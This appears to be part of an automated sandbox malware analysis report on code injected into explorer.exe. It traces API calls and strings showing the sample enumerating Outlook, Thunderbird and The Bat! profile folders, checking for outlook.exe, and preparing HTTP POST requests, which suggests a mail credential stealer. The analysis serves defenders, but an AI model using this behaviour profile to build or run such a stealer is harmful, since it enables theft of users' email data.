FindNextFileW.KERNELBASE ref: 00193218
FindClose.KERNELBASE ref: 00193229

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: a118164f0d8dda437dde0cb6da1c0d43d48d2c94ca3894313943429f33e82582
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: 40417130318B4D5FDF98FB3898597AA73D2FBE8340F444A29A45AC3195EF78D9048782

Function 001938B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 001938F2

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: ffe50e77ae542e390fe63fcc883ae872afac61933e34ad064f63f81f3b734d4f
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: BAF0E524F11A091BEF6C77FD685D3382290EB68314F900629B525C32E2DE398E868302

Function 00192774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 001927C7
RegQueryValueExW.KERNELBASE ref: 001927F4
RegQueryValueExW.KERNELBASE ref: 0019283A
RegCloseKey.KERNELBASE ref: 00192860

Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: 1b768874c174c82d1c167c2c69666b84cbc8b7aabefa14be5fd04485af0264df
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: 7D31B63020CB499FEB68DB28D45877A7BD4FBE8355F54062EE49AC3265DF34C8468742

Function 0019372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 001937B2
RegCloseKey.KERNELBASE ref: 001937C1

Strings

?, xrefs: 001937A2

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: 417e2500c3ce7a6ea4945b80db7a3e89e45073146300812cfd667e7d297a25b4
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: B911B270618B4C8FD754DF69D48866AB7E1FB98345F40062EE49AC3320DF38D985CB82

Function 0019A298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0019A397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0019A441
VirtualProtect.KERNELBASE ref: 0019A45F

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000199000.00000040.80000000.00040000.00000000.sdmp, Offset: 00199000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_199000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: ee9c6ed0ef3919c0b562a5841b3ed0485e0f9a6ee3946cfd32e19fc8320d504e
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 0E51783235891D4BCF24AB789CC42F4B7D1FF59325BA8062AC09AC3284DB59D94E83C3

Function 00193254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0019298C: GetFileAttributesW.KERNELBASE ref: 0019299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 0019330F
GetPrivateProfileStringW.KERNEL32 ref: 0019336F
GetPrivateProfileIntW.KERNEL32 ref: 0019338C

Part of subcall function 001930A8: FindFirstFileW.KERNELBASE ref: 00193104

Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: a04b7f48c8e3f9b2e1086c3519f2f3292c331b54d25ca1890a34149f688f6f07
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: 4A51B730728F094FEF59BB2C985667972D2FBA8340B44056DE41AC3296EF64DE428386

Function 00193458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 0019347E
RegOpenKeyExW.KERNELBASE ref: 0019353F
RegEnumKeyExW.KERNELBASE ref: 001935D6

Part of subcall function 00192774: RegOpenKeyExW.KERNELBASE ref: 001927C7
Part of subcall function 00192774: RegQueryValueExW.KERNELBASE ref: 001927F4
Part of subcall function 00192774: RegQueryValueExW.KERNELBASE ref: 0019283A
Part of subcall function 00192774: RegCloseKey.KERNELBASE ref: 00192860

Part of subcall function 00193254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 0019330F

Part of subcall function 00191860: RtlFreeHeap.NTDLL ref: 00191880

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: d5cf65f3a830936643f5b07f20d336f84c25b66b1f4d7b0e9b3ae49a3eeba4cc
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: CF416A30718B094FDF98EF6D849972AB6E2FBAC340F01496EA04EC3261DF34D9458B42

Function 00192938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00192966
CloseHandle.KERNELBASE ref: 0019297A

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: fb5bc17cbf33c73076805367d96850c0818297b181fe73cae1cf891fbe22ef9b
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 7BF02B7021571A8FEF446FB84498336B5D0FB0831DF18473DE45AC22D0D77488468703

Function 001922B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 001922D0

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: c9a8053a8168de25ac7323a8a36e7d24cfa4328c0c735cf41fff6c12615043fa
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 0EE0C230108B0A8FDB58AFBCE4CA07933A1FB9C252B05053FE005CB114D27988C1C741

Function 0019298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 0019299E

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: b878910cf4ac27eeeaa461caac8182f50a55c279510a0f00d114d032d3ecd606
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: 6BD0A722712915277F6826F908DD27130A0D71932EF94033AEA36C51E0E3A5CCD5A201

Function 00191860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 00191880

Memory Dump Source

Source File: 00000012.00000002.2219790924.0000000000191000.00000040.80000000.00040000.00000000.sdmp, Offset: 00191000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_191000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: 18569adbe7bb0e640094fa81c5465fabc9faffa733a5ce6104e562fca6a8c509
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: A7D01264716A051BEF2CBBFA1C8D1747AD2E768212B588065B819C3261DE39CCD5C342

Analysis Process: explorer.exePID: 7868, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	96.2%
Signature Coverage:	0%
Total number of Nodes:	211
Total number of Limit Nodes:	2

Executed Functions

Function 02F5255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1

lstrcatW.KERNEL32(00000000,?,02F518F4), ref: 02F52588
PathAppendW.SHLWAPI(00000000,*.*,?,02F518F4), ref: 02F52594
FindFirstFileW.KERNELBASE(00000000,?,?,02F518F4), ref: 02F525A8
RtlZeroMemory.NTDLL(00000209,00000209), ref: 02F525C3
lstrcatW.KERNEL32(00000209,?,?,02F518F4), ref: 02F525E1
PathAppendW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F525ED
lstrcatW.KERNEL32(00000209,?,?,02F518F4), ref: 02F52611
PathAppendW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F5261D
StrStrIW.SHLWAPI(00000209,?,?,02F518F4), ref: 02F5262C
FindNextFileW.KERNELBASE(00000000,?,?,02F518F4), ref: 02F52644
FindClose.KERNELBASE(00000000,?,02F518F4), ref: 02F52653

Strings

*.*, xrefs: 02F5258E

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
String ID: *.*
API String ID: 1648349226-438819550
Opcode ID: 0583e12b828f981330c92a254e64e790bb0feb4f27fc7193783b14853c969d0e
Instruction ID: ff12978125b8565e8a8378dbc5774b368694f5831cc9b911706dfc479deee171
Opcode Fuzzy Hash: 0583e12b828f981330c92a254e64e790bb0feb4f27fc7193783b14853c969d0e
Instruction Fuzzy Hash: DE218E71A043299FD710AF249D48A6FFBECEF95BC8F000A18FF5192141DB34C9168B66

Function 02F51016 Relevance: 3.0, APIs: 2, Instructions: 19
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F527E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,02F52664,?,02F518F4), ref: 02F527EF

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 02F5103A
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 02F51043

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: 1c39e081934a2a8c25331090c804343652c2e468bd2953af0c6d605f789c9d5c
Instruction ID: a7ac9b9714208eb0ca20091448ce2d44e9388d577ac6698c12cfc33fbd141a9f
Opcode Fuzzy Hash: 1c39e081934a2a8c25331090c804343652c2e468bd2953af0c6d605f789c9d5c
Instruction Fuzzy Hash: AED05E31C44378A7CA647778BC18ACB3E4D9F05BF0B244B51BF39A21C1C97949508BB0

Function 02F5104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1

ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F5107F
ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F51093
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510A7
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,02F5104E,?,02F51010), ref: 02F510BB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510D3
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510E7
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F510FB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F5110F
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,02F5104E,?,02F51010), ref: 02F51123
wsprintfA.USER32 ref: 02F5116B
ExitProcess.KERNEL32 ref: 02F51189

Strings

%APPDATA%\Thunderbird, xrefs: 02F510CE
%ALLUSERSPROFILE%\Microsoft\Outlook, xrefs: 02F510A2
%LOCALAPPDATA%\Microsoft\Outlook, xrefs: 02F5108E
%APPDATA%\BatMail, xrefs: 02F5110A
%APPDATA%\The Bat!, xrefs: 02F510E2
%s,, xrefs: 02F51165
%APPDATA%\Microsoft\Outlook, xrefs: 02F5107A
%ALLUSERSPROFILE%\BatMail, xrefs: 02F5111E
%ALLUSERSPROFILE%\The Bat!, xrefs: 02F510F6

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
API String ID: 1709485025-1688604020
Opcode ID: e7c05dca1b29cb19d272efff4c7085450a7a7610695886687510347c4935c596
Instruction ID: ee8eff1138c64139bf9358e101d53a0fe4d5baa9e3fae4f448e151035d4f27de
Opcode Fuzzy Hash: e7c05dca1b29cb19d272efff4c7085450a7a7610695886687510347c4935c596
Instruction Fuzzy Hash: C031BF51B803396BFA2132694C55F7F7A4E9F81FD8B0501A4AF0EEA381DF54EC018AB1

Function 02F5274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F52758
Process32First.KERNEL32(00000000,?), ref: 02F52777
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 02F5278B
Process32Next.KERNEL32(00000000,00000128), ref: 02F527A8
CloseHandle.KERNELBASE(00000000), ref: 02F527B3

Strings

outlook.exe, xrefs: 02F5277F

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID: outlook.exe
API String ID: 868014591-749849299
Opcode ID: 45233f1a4ab97f9bfcfc05649b91b2c9d1d7d2c957171a47f035793d84c8bbbc
Instruction ID: f15e130b9082334af704e1ff24836ed3a7881e5f9cd2baa1010893b0705904d2
Opcode Fuzzy Hash: 45233f1a4ab97f9bfcfc05649b91b2c9d1d7d2c957171a47f035793d84c8bbbc
Instruction Fuzzy Hash: 2AF06831D4133CABD710EA68EC48BDDB77C9F087E5F0006D0EF59A1181EB3489654B91

Function 02F59CF6 Relevance: 3.3, APIs: 2, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F58000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F58000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f58000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec1d821bb1014c1affa9bc600fb0a0d9767a64e4ac34f5c0f6d5693ee9b7548
Instruction ID: 73a25765dea4d8bfad5cdc64c6d36c39094f4d103c395a94fb1ae15f634aaf3f
Opcode Fuzzy Hash: 5ec1d821bb1014c1affa9bc600fb0a0d9767a64e4ac34f5c0f6d5693ee9b7548
Instruction Fuzzy Hash: EF912B729153A1CFD71A4A74CDC07B57BA0EB422A4B5C0669CFD2CB286E7E46806C7E0

Function 02F529B7 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 278caca1d391f710eaabe6ca98291b507b74ea8b291e50d008419c73ba7ae75b
Instruction ID: 1cba029ede5f6f653073c05b660e41bbd25e69c4bde1bf7bc9ee544f4f57b0f4
Opcode Fuzzy Hash: 278caca1d391f710eaabe6ca98291b507b74ea8b291e50d008419c73ba7ae75b
Instruction Fuzzy Hash: 68A002B1D903245BDD8457BDAE0DA15F528AF44BC5F004984734685444996454348721

Non-executed Functions

Function 02F520A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1

Part of subcall function 02F52938: lstrlen.KERNEL32(03306EB6,?,00000000,00000000,02F520E3,74DE8A60,03306EB6,00000000), ref: 02F52940
Part of subcall function 02F52938: MultiByteToWideChar.KERNEL32(00000000,00000000,03306EB6,00000001,00000000,00000000), ref: 02F52952

Part of subcall function 02F524CC: RtlZeroMemory.NTDLL(?,00000018), ref: 02F524DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02F5213F
wsprintfW.USER32 ref: 02F52278
wsprintfW.USER32 ref: 02F522E3
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02F523AD

Strings

Host: %s, xrefs: 02F522DD
Content-Type: application/x-www-form-urlencoded, xrefs: 02F52307
Accept: */*Referer: %S, xrefs: 02F5226E
POST, xrefs: 02F52229

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 6a849c091a73a5775e9b05adfbab9b28404bd78e7a50a6439efbc1677034a0c6
Instruction ID: 2cb5029c22afa2a83b3579f2e398cefc8342fdd8a15ab8c5cb51cc4f2476d0a7
Opcode Fuzzy Hash: 6a849c091a73a5775e9b05adfbab9b28404bd78e7a50a6439efbc1677034a0c6
Instruction Fuzzy Hash: 7EA15B71A08364AFD7109F68D884A2FBBE9EF88794F040A2DFF85D3251DB70D9048B52

Function 02F51ECE Relevance: 12.1, APIs: 8, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIA.SHLWAPI(?,02F531D8,00000000,03307258), ref: 02F51EE4
RtlMoveMemory.NTDLL(?,?,00000000), ref: 02F51F08
RtlMoveMemory.NTDLL(?,?,00000100), ref: 02F51F22
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 02F51F31
StrStrIA.SHLWAPI(00000000,?,?,00000000), ref: 02F51F44
StrStrIA.SHLWAPI(?,?,?,00000000), ref: 02F51F57
lstrlen.KERNEL32(?,?,00000000), ref: 02F51F64
lstrlen.KERNEL32(?,?,?,00000000), ref: 02F51F9D

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: MemoryMovelstrlen
String ID:
API String ID: 456560858-0
Opcode ID: edab0126ed5f7efad3d3902c48630a22d8109950046133999a08411fad3b35a2
Instruction ID: 9ea09b37f4862a14cc8d20b11eeeabf6f894edbb955c01ca563a98f7889ace10
Opcode Fuzzy Hash: edab0126ed5f7efad3d3902c48630a22d8109950046133999a08411fad3b35a2
Instruction Fuzzy Hash: D1219072D043296AD730A9689CC5FEBB7DD9B463C4F010A26EF48C3101E729E54A87A2

Function 02F51E44 Relevance: 7.6, APIs: 5, Instructions: 81
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,02F51BF4), ref: 02F51E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,02F51BF4), ref: 02F51E69
lstrcmpiA.KERNEL32(?,033081FC), ref: 02F51E81
lstrlen.KERNEL32(?,00000000), ref: 02F52699
RtlMoveMemory.NTDLL(033081FC,?,00000000), ref: 02F526A2

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: 7a6a79505cb684f2df8825b4d46f390d5d602814c55f5b2993cdd1f96712bc1b
Instruction ID: 2305f8157957db586191f50cd13b623c58387d7112e60714f1dbc1572fe55335
Opcode Fuzzy Hash: 7a6a79505cb684f2df8825b4d46f390d5d602814c55f5b2993cdd1f96712bc1b
Instruction Fuzzy Hash: 1221AA76E003349FD7109B18EC84A7BB7DDEF856E9B10056AEF55C7240D771A8068BA1

Function 02F51E3E Relevance: 7.6, APIs: 5, Instructions: 76
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,02F51BF4), ref: 02F51E5D
CharLowerBuffA.USER32(?,00000000,?,?,?,?,?,?,?,02F51BF4), ref: 02F51E69
lstrcmpiA.KERNEL32(?,033081FC), ref: 02F51E81
lstrlen.KERNEL32(?,00000000), ref: 02F52699
RtlMoveMemory.NTDLL(033081FC,?,00000000), ref: 02F526A2

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: lstrlen$BuffCharLowerMemoryMovelstrcmpi
String ID:
API String ID: 2826435453-0
Opcode ID: a429ef67a108a4c05d37dce1082a192b393af78820012fd3a43b5b3fe80c59bb
Instruction ID: 7d73b0d93b11422af3db49dfd17df19cee3ebf15e080f4b580bdba0fed8866b9
Opcode Fuzzy Hash: a429ef67a108a4c05d37dce1082a192b393af78820012fd3a43b5b3fe80c59bb
Instruction Fuzzy Hash: 7721DA76E003349FD7109F28DC84A6B77DDEF8A6D8B000569EF45D7241C771A8068BA1

Function 02F518F4 Relevance: 6.1, APIs: 4, Instructions: 51
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 02F5190C
GetFileSize.KERNEL32(00000000,00000000), ref: 02F5191C
CloseHandle.KERNEL32(00000000), ref: 02F51966

Part of subcall function 02F529B7: GetProcessHeap.KERNEL32(00000008,00000412,02F5257A,02F518F4), ref: 02F529BA
Part of subcall function 02F529B7: RtlAllocateHeap.NTDLL(00000000), ref: 02F529C1

ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02F51941

Memory Dump Source

Source File: 00000013.00000002.2230392486.0000000002F51000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2f51000_explorer.jbxd

Similarity

API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
String ID:
API String ID: 2517252058-0
Opcode ID: 49b1086d2338cffc496c6c3997b00e3f850ede116292e596b3d157a80ada7945
Instruction ID: 9fe808c20d8f5a92d789018c61973615aa4df6c366592a2b56f69f3ac2b1477a
Opcode Fuzzy Hash: 49b1086d2338cffc496c6c3997b00e3f850ede116292e596b3d157a80ada7945
Instruction Fuzzy Hash: EC01DB32B0033877D2212A399C58F6FB55DDF86AF8F010629BF5AA21D0DB2169155670

Analysis Process: explorer.exePID: 7968, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	14.2%
Dynamic/Decrypted Code Coverage:	99.6%
Signature Coverage:	0%
Total number of Nodes:	285
Total number of Limit Nodes:	16

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

